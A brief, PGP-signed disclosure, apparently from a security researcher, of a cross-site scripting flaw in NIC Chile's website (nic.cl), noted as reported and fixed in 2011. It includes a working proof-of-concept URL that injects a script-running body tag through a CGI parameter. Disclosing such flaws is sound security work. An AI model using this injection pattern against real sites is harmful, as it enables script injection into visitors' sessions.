NIC Chile suffered from a cross site scripting vulnerability. This was immediately fixed.
18f8576ee42824d07fd5dd1c562751fa1624fa8b6f02a134d03a12705a7086db
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
* Main URI: http://www.nic.cl
* Type: Cross Site Scripting
* Exploitable URI:
http://www.nic.cl/cgi-bin/show-form?f=/example/201001191941%3Cbody%20onload=alert%28this%29%3E3a6
* Status: *Reported*
* Date: April 20, 2011, 12:27 p.m.
Reported on: http://www.secureless.org/vulnerability/1347/
- --
Zerial
Seguridad Informatica
GNU/Linux User #382319
Blog: http://blog.zerial.org
Jabber: zerial@jabberes.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAk2u/XQACgkQIP17Kywx9JTzjQCeNIbJsr/6fZ1Pr2mO8u7Jb3jA
TmsAoIdn2ceeo9iO4iC8MmwWO/6tUfRk
=sCbb
-----END PGP SIGNATURE-----